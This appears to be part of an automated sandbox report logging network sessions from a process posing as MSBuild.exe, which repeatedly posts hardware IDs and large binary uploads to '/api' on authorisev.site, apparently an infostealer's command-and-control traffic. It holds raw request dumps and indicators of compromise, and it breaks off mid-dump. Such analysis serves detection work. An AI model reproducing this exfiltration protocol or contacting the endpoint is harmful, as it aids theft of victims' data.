                                                                                                                                                  2024-11-01 09:50:57 UTC1369INData Raw: 78 73 4b 2b 58 59 54 73 79 48 63 38 49 49 58 45 38 67 4b 7a 57 74 30 36 43 62 63 56 39 41 37 36 6c 65 71 6a 51 31 6d 44 43 47 43 4f 77 62 77 50 33 61 4f 46 4e 58 45 6a 6a 34 69 71 51 6f 74 4c 30 43 38 4a 2b 6a 48 77 46 66 36 4e 36 4c 70 41 45 70 6c 46 66 63 48 4a 76 45 65 50 6f 38 5a 35 65 7a 2f 64 33 4f 70 75 67 56 33 51 66 79 48 76 4b 76 51 5a 36 70 54 6b 70 41 38 47 30 6c 38 35 79 63 72 77 46 38 58 6a 69 54 52 75 49 70 79 4f 6f 45 2b 4b 51 39 38 34 43 66 45 34 2b 42 76 70 6b 65 61 6f 53 52 4b 64 51 33 72 46 7a 4c 35 47 6c 36 50 47 65 58 73 2f 33 64 7a 71 61 4a 6c 4e 31 7a 46 45 32 7a 66 6c 45 72 6d 2b 35 36 4e 49 46 59 6f 47 5a 6f 44 66 38 45 69 4a 6f 39 42 35 64 53 6d 52 68 36 31 4b 69 6b 6e 61 4e 67 62 36 4e 76 30 53 36 5a 58 6c 6f 6c 30 57 6e 30 74
                                                                                                                                                  Data Ascii: xsK+XYTsyHc8IIXE8gKzWt06CbcV9A76leqjQ1mDCGCOwbwP3aOFNXEjj4iqQotL0C8J+jHwFf6N6LpAEplFfcHJvEePo8Z5ez/d3OpugV3QfyHvKvQZ6pTkpA8G0l85ycrwF8XjiTRuIpyOoE+KQ984CfE4+BvpkeaoSRKdQ3rFzL5Gl6PGeXs/3dzqaJlN1zFE2zflErm+56NIFYoGZoDf8EiJo9B5dSmRh61KiknaNgb6Nv0S6ZXlol0Wn0t
                                                                                                                                                  2024-11-01 09:50:57 UTC1369INData Raw: 6c 62 46 35 49 52 35 4a 47 65 64 67 4b 5a 42 68 55 4c 56 4d 41 6e 79 4e 2f 77 66 39 59 33 6d 72 55 63 56 6c 45 74 72 78 4d 79 69 52 6f 7a 75 68 6a 46 75 4a 4e 33 4b 36 6b 57 61 44 49 4a 39 4e 50 38 2f 2f 77 50 32 6b 4b 6d 33 41 51 44 63 51 58 57 4f 6e 76 42 64 6c 2b 4f 44 4f 58 73 70 6a 34 57 69 54 59 68 4d 33 44 59 4d 39 6a 58 33 47 2f 4b 5a 36 4b 56 4f 47 4a 78 44 65 63 66 55 76 51 2f 4c 6f 34 38 68 50 48 2f 64 73 36 5a 4a 73 30 2f 4d 66 52 6d 37 4a 62 4d 53 39 39 2b 78 36 45 34 4c 6b 55 35 39 7a 73 75 32 52 49 54 69 69 7a 6c 38 4a 4a 32 42 6f 55 32 45 53 39 63 33 44 2f 77 75 2b 78 48 70 6e 2b 57 73 44 31 66 63 51 57 47 4f 6e 76 42 2f 68 75 69 45 4f 58 45 79 33 5a 76 6b 57 38 4a 4c 31 6e 31 65 74 54 54 34 48 76 32 55 36 71 74 42 45 70 5a 4a 64 73 54 41
                                                                                                                                                  Data Ascii: lbF5IR5JGedgKZBhULVMAnyN/wf9Y3mrUcVlEtrxMyiRozuhjFuJN3K6kWaDIJ9NP8//wP2kKm3AQDcQXWOnvBdl+ODOXspj4WiTYhM3DYM9jX3G/KZ6KVOGJxDecfUvQ/Lo48hPH/ds6ZJs0/MfRm7JbMS99+x6E4LkU59zsu2RITiizl8JJ2BoU2ES9c3D/wu+xHpn+WsD1fcQWGOnvB/huiEOXEy3ZvkW8JL1n1etTT4Hv2U6qtBEpZJdsTA
                                                                                                                                                  2024-11-01 09:50:57 UTC1369INData Raw: 4b 46 4d 6e 42 6c 6e 49 6d 36 52 63 49 43 6d 6a 74 47 72 57 79 39 56 66 2b 4f 71 66 41 66 53 38 63 54 4b 70 6d 57 34 6c 44 4c 2b 73 67 76 50 48 2f 50 79 75 70 51 77 68 53 61 65 67 58 6e 4c 76 55 57 37 5a 79 75 6c 6e 45 35 6c 30 70 36 77 73 65 33 44 38 75 6a 68 33 6b 6b 48 74 32 48 75 46 44 4e 58 63 77 77 46 76 4a 77 2b 77 54 32 6b 36 6e 6d 44 31 57 59 54 58 58 4c 77 61 41 41 6c 2f 4f 44 4e 57 70 72 6d 5a 62 71 44 4d 4a 64 30 54 49 55 2b 7a 75 38 42 4f 32 53 2b 61 74 4b 48 74 42 4f 61 4d 50 4b 38 41 48 46 39 6f 4d 31 65 69 71 49 79 37 74 55 67 56 72 64 63 51 37 6b 4d 66 39 56 78 4e 47 70 73 41 39 42 33 48 4e 36 77 4d 69 33 57 5a 53 75 71 44 4a 77 4a 4a 47 46 72 51 4c 4d 44 4e 78 39 58 71 5a 79 73 78 48 71 33 37 48 34 48 55 4c 4a 46 53 36 65 6c 4b 38 42 6e
                                                                                                                                                  Data Ascii: KFMnBlnIm6RcICmjtGrWy9Vf+OqfAfS8cTKpmW4lDL+sgvPH/PyupQwhSaegXnLvUW7ZyulnE5l0p6wse3D8ujh3kkHt2HuFDNXcwwFvJw+wT2k6nmD1WYTXXLwaAAl/ODNWprmZbqDMJd0TIU+zu8BO2S+atKHtBOaMPK8AHF9oM1eiqIy7tUgVrdcQ7kMf9VxNGpsA9B3HN6wMi3WZSuqDJwJJGFrQLMDNx9XqZysxHq37H4HULJFS6elK8Bn
                                                                                                                                                  2024-11-01 09:50:57 UTC1369INData Raw: 38 66 38 37 4b 36 6c 44 43 46 4a 70 36 43 50 67 39 38 42 76 34 6a 66 75 75 54 41 2b 66 41 55 66 77 34 37 31 43 67 4f 32 50 42 30 49 47 6c 35 53 6e 54 59 56 79 35 41 6f 58 38 69 79 78 4d 2f 69 4a 36 75 67 42 57 59 51 47 49 59 37 6e 75 6c 2b 49 37 49 39 35 4d 6d 65 5a 78 50 49 43 70 30 48 58 4f 41 6a 79 66 74 49 66 36 35 4c 6d 72 77 39 58 33 45 6f 35 6c 6f 61 78 52 5a 58 75 68 7a 34 77 49 49 65 44 36 67 7a 43 51 70 70 6c 52 76 51 32 34 78 6a 30 6d 4b 57 75 51 52 66 63 57 54 66 58 68 71 59 50 33 62 44 47 65 57 35 6e 78 63 54 74 54 49 39 4e 32 54 4d 46 35 79 37 31 46 75 32 63 72 70 5a 78 50 4a 46 4c 66 4d 44 42 6a 6e 47 6b 36 5a 67 30 63 79 44 66 70 4b 31 55 67 58 4c 6b 43 68 66 79 4c 4c 45 7a 2b 49 6e 71 36 41 46 5a 68 41 59 68 6a 75 65 36 58 34 6a 73 6a 33
                                                                                                                                                  Data Ascii: 8f87K6lDCFJp6CPg98Bv4jfuuTA+fAUfw471CgO2PB0IGl5SnTYVy5AoX8iyxM/iJ6ugBWYQGIY7nul+I7I95MmeZxPICp0HXOAjyftIf65Lmrw9X3Eo5loaxRZXuhz4wIIeD6gzCQpplRvQ24xj0mKWuQRfcWTfXhqYP3bDGeW5nxcTtTI9N2TMF5y71Fu2crpZxPJFLfMDBjnGk6Zg0cyDfpK1UgXLkChfyLLEz+Inq6AFZhAYhjue6X4jsj3


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.449743104.21.85.1944437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-01 09:50:58 UTC370OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                  Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 18158
                                                                                                                                                  Host: authorisev.site
                                                                                                                                                  2024-11-01 09:50:58 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62
                                                                                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
                                                                                                                                                  2024-11-01 09:50:58 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                                                                                                  Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                                                                                                  2024-11-01 09:50:58 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                  Date: Fri, 01 Nov 2024 09:50:58 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=u6gsf2km28l620bmdno9mevahi; expires=Tue, 25-Feb-2025 03:37:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YKZe5cwIt096MEYLLIa1Exuee4Isxxp15WU4KnVyN0tLneJHfPda13DH%2BBYZ8D7JHbMmkK22C5Z2HOf2CoRlWKMfKUV5NotvmwOjF3ePlq3MPOugPD5WP0ACXdmOfV98TlU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8dbafbce1e636be4-DFW
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1046&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19208&delivery_rate=2714151&cwnd=251&unsent_bytes=0&cid=e78afba61c4eb225&ts=674&x=0"
                                                                                                                                                  2024-11-01 09:50:58 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 0d 0a
                                                                                                                                                  Data Ascii: 11ok 173.254.250.82
                                                                                                                                                  2024-11-01 09:50:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.449749104.21.85.1944437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-01 09:50:59 UTC369OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                  Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 8779
                                                                                                                                                  Host: authorisev.site
                                                                                                                                                  2024-11-01 09:50:59 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62
                                                                                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
                                                                                                                                                  2024-11-01 09:51:00 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                  Date: Fri, 01 Nov 2024 09:50:59 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=jp8p2as93q4a8bjh9dkq61gmah; expires=Tue, 25-Feb-2025 03:37:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyA2JNLcaeFabk0cUjtHGY8OgTf3bJx%2Fwbi1i8jkFkX%2FQGZFsnn6WXyh5yzSaCywUMD7RZAGiGlLSlAeCEhzq8KMAAqf%2BL1iilO4EkOBFILt6lIyAxyTkbqyxv3PqSgHK64%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8dbafbd65a414772-DFW
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2838&recv_bytes=9806&delivery_rate=2395368&cwnd=239&unsent_bytes=0&cid=6639c4cc97cc4491&ts=544&x=0"
                                                                                                                                                  2024-11-01 09:51:00 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 0d 0a
                                                                                                                                                  Data Ascii: 11ok 173.254.250.82
                                                                                                                                                  2024-11-01 09:51:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.449755104.21.85.1944437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-01 09:51:00 UTC370OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                  Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 20432
                                                                                                                                                  Host: authorisev.site
                                                                                                                                                  2024-11-01 09:51:00 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62
                                                                                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
                                                                                                                                                  2024-11-01 09:51:00 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                  2024-11-01 09:51:01 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                  Date: Fri, 01 Nov 2024 09:51:01 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=31fdgrbvb5f12pfprslqjbm27n; expires=Tue, 25-Feb-2025 03:37:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Y7Vn%2BthisQCGgC2mpVCfdktv3v4Q9LO2Zb%2FPfJGbOrPBab%2FBsjLvjDZakxBTroW7Jk7YQMv0sYU1pgJf4X4mDekljDJfQUpGfqsCAmDl2cQG%2Bv7wkm1ZZW%2FQx5raawd5i0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8dbafbddf9d1468a-DFW
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1927&sent=13&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21482&delivery_rate=1494324&cwnd=247&unsent_bytes=0&cid=e0d1e84144c3b454&ts=843&x=0"
                                                                                                                                                  2024-11-01 09:51:01 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 0d 0a
                                                                                                                                                  Data Ascii: 11ok 173.254.250.82
                                                                                                                                                  2024-11-01 09:51:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.449766104.21.85.1944437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-01 09:51:02 UTC369OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                  Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 1233
                                                                                                                                                  Host: authorisev.site
                                                                                                                                                  2024-11-01 09:51:02 UTC1233OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62
                                                                                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
                                                                                                                                                  2024-11-01 09:51:02 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                  Date: Fri, 01 Nov 2024 09:51:02 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=2bm7qct773o70o4h7di9qbbfc7; expires=Tue, 25-Feb-2025 03:37:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kMGsLYmF9x68kyHEhRbGJterNNgYin5DS8Zkf%2FQ5NEtWXXF1XHe3lz6KgCPSj2PPjHJGfFR78mUN0Fmb2QxcuqJ%2BH%2BxE6e25O1oxtbwK0Kjot0P6L9HDxsnEQTpKby%2FBasY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8dbafbe77a68e736-DFW
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1361&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2238&delivery_rate=2028011&cwnd=59&unsent_bytes=0&cid=165c5b1ef8db7c12&ts=721&x=0"
                                                                                                                                                  2024-11-01 09:51:02 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 0d 0a
                                                                                                                                                  Data Ascii: 11ok 173.254.250.82
                                                                                                                                                  2024-11-01 09:51:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.449777104.21.85.1944437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-01 09:51:03 UTC371OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                  Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 563570
                                                                                                                                                  Host: authorisev.site
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62
